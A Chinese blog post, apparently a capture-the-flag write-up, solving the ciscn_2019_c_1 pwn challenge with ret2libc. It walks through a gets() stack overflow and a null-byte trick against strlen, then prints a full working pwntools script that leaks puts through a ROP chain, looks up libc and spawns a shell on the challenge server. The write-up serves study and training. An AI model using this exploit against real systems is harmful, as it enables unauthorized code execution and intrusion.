news 2026/5/1 7:13:09

PWN手的成长之路-14-ciscn_2019_c_1-ret2libc

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
PWN手的成长之路-14-ciscn_2019_c_1-ret2libc

查看 main 函数:

image

image

image

再结合程序的运行,我们输入的值存到了 v4 中,当 v4=2 时,程序重新再次执行 begin() 函数,若输入 3,则直接退出程序,只有当我们输入 1 的时候,程序才会调用 encrypt() 函数。

查看 encrypt() 函数。gets() 读取输入并进入循环,通过 strlen(s) 获取用户输入的字节长度并对字符进行一系列异或操作。

image

发现存在 gets() 高危函数,猜测存在栈溢出漏洞。但是这道题没有 system("/bin/sh"),并且文件开启了 NX 保护,因此 ret2shellcode、ret2text基本排除了,所以只能是 ret2libc。

ret2libc 是不直接注入 shellcode (因为程序通常具有 NX 保护,栈不可知执行),而是通过利用程序自身加载的动态链接库(比如 libc.so)中的函数(如 system()、execve()等)来执行任意的代码。

但是这道题并没有给出 libc.so 文件,并且程序自身也没有 system 函数和 "/bin/sh" 字符串,所以就需要先泄露程序中的函数地址,再查询 libc 版本,并找到 system 函数和 "/bin/sh" 字符串的内存地址。

再分析 encrypt() 函数,strlen 函数是一个C库中的函数,主要用于计算以空字符 “\0”

为结尾的字符串长度,它会从传入的字符串开始检查每一个字符,直到遇到 “\0” 为止,然后返回遇到的字符串个数(其中不包括 "\0" 本身),例如:给定字符串 “hello”,strlen 函数会返回5,但是如果在字符串开头加上 "\0",那么此时 strlen 函数就会返回0,例如:输入字符串 "\0hello",strlen 函数就会返回0,因为 strlen 函数的机制就是遇到 "\0" 就停止计数,在 encrypt() 函数的后续有说明当 v0>= strlen(s),但是由于 strlen 返回的就是0,所以 v0>=strlen(s) 为假,条件不成立则跳出循环,即跳过了 encrypt 函数对字符串进行异或操作的逻辑,以达到 “破坏” 加密流程的目的(目的就是不让他进行加密操作)。

因为函数没有 system 、/bin/sh,所以攻击会变得较为复杂步骤:

1、泄露libc函数地址(puts)

2、计算其他libc函数地址(system)

3、构造ROP链(/bin/sh)

具体流程:先泄露 puts 函数 plt,再泄露 puts 函数 got 表,栈溢出覆盖返回地址,控制流程使其跳转到 puts@plt,设置 put 参数的内存地址为 got(即泄露 puts 在内存中的实际地址),再返回 main 函数,为什么是 main 函数,因为需要返回到可以再次触发漏洞的攻击函数,方便二次攻击。

再得到puts的真实地址后,使用得到puts地址并结合ibc数据库匹配相对应的libc版本,再计算其他函数的偏移地址。

最终exp(调试了快两天才最终于2025/10/12/14:40成功):

from pwn import *

from LibcSearcher import *

#start

r = remote('node5.buuoj.cn',28626)

#r = process('./pwn')

elf = ELF('./pwn')

#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6') #ldd pwn

context.log_level='debug'

#params

rdi_addr = 0x400C83

ret_addr = 0x4006b9

puts_plt = elf.plt['puts']

puts_got = elf.got['puts']

main_addr = elf.sym['main']

#attack

payload = b'a'*(0x50 + 8) + p64(rdi_addr) + p64(puts_got) + p64(puts_plt) + p64(main_addr)

r.sendlineafter(b"choice",b'1')

r.sendline(payload)

puts_addr = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))

#puts_addr = u64(r.recvline()[:-1].ljust(8,b'\0'))

print(hex(puts_addr))

#libc

libc = LibcSearcher("puts",puts_addr)

base_addr = puts_addr - libc.dump('puts')

system_addr = base_addr + libc.dump('system')

bin_sh_addr = base_addr + libc.dump('str_bin_sh')

#base_addr = puts_addr - libc.symbols['puts']

#system_addr = base_addr + libc.symbols['system']

#bin_sh_addr = base_addr + next(libc.search(b'/bin/sh'))

#attack2

payload2 = b'a'*(0x50+8) + p64(ret_addr) + p64(rdi_addr) + p64(bin_sh_addr) +p64(system_addr)

r.sendlineafter(b'choice',b'1')

r.recvuntil(b'encrypted')

r.sendline(payload2)

r.interactive()

参考1000x_师傅的文章。

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/5/1 6:09:47

OpenModScan:工业通讯调试的终极Modbus主站工具解决方案

OpenModScan:工业通讯调试的终极Modbus主站工具解决方案 【免费下载链接】OpenModScan Open ModScan is a Free Modbus Master (Client) Utility 项目地址: https://gitcode.com/gh_mirrors/op/OpenModScan 在工业自动化设备调试和物联网系统开发中&#xff…

作者头像 李华
网站建设 2026/4/25 19:08:42

语音识别的“小巨人“:当AI学会倾听你的故事

语音识别的"小巨人":当AI学会倾听你的故事 【免费下载链接】whisper-tiny.en 项目地址: https://ai.gitcode.com/hf_mirrors/openai/whisper-tiny.en "医生,这个病例我需要记录一下..." 在波士顿一家繁忙的医院里&#xff0…

作者头像 李华
网站建设 2026/4/28 21:44:34

5分钟精通NewGAN-Manager:足球经理面部包配置的终极解决方案

5分钟精通NewGAN-Manager:足球经理面部包配置的终极解决方案 【免费下载链接】NewGAN-Manager A tool to generate and manage xml configs for the Newgen Facepack. 项目地址: https://gitcode.com/gh_mirrors/ne/NewGAN-Manager 想要在《Football Manager…

作者头像 李华
网站建设 2026/5/1 5:47:32

终极指南:如何零成本搭建完全离线的AI文档生成系统

终极指南:如何零成本搭建完全离线的AI文档生成系统 【免费下载链接】deepwiki-open Open Source DeepWiki: AI-Powered Wiki Generator for GitHub Repositories 项目地址: https://gitcode.com/gh_mirrors/de/deepwiki-open 还在为代码文档撰写而头疼吗&…

作者头像 李华
网站建设 2026/5/1 6:54:46

抖音视频纯净下载神器:轻松获取无水印高清内容

抖音视频纯净下载神器:轻松获取无水印高清内容 【免费下载链接】douyin_downloader 抖音短视频无水印下载 win编译版本下载:https://www.lanzous.com/i9za5od 项目地址: https://gitcode.com/gh_mirrors/dou/douyin_downloader 还在为抖音视频上的…

作者头像 李华
网站建设 2026/4/30 6:39:17

13、网络编程基础与实践

网络编程基础与实践 1. 网络编程引言 网络编程是一个复杂的问题,因为它需要通过不确定的通道进行复杂的通信。幸运的是,Bash 可以处理大部分细节,使得编写和使用企业级脚本变得容易。例如,曾经有人在寻找辅助 Usenet 源时与 Sun 计算机经销商沟通,经销商设置好并发送了连…

作者头像 李华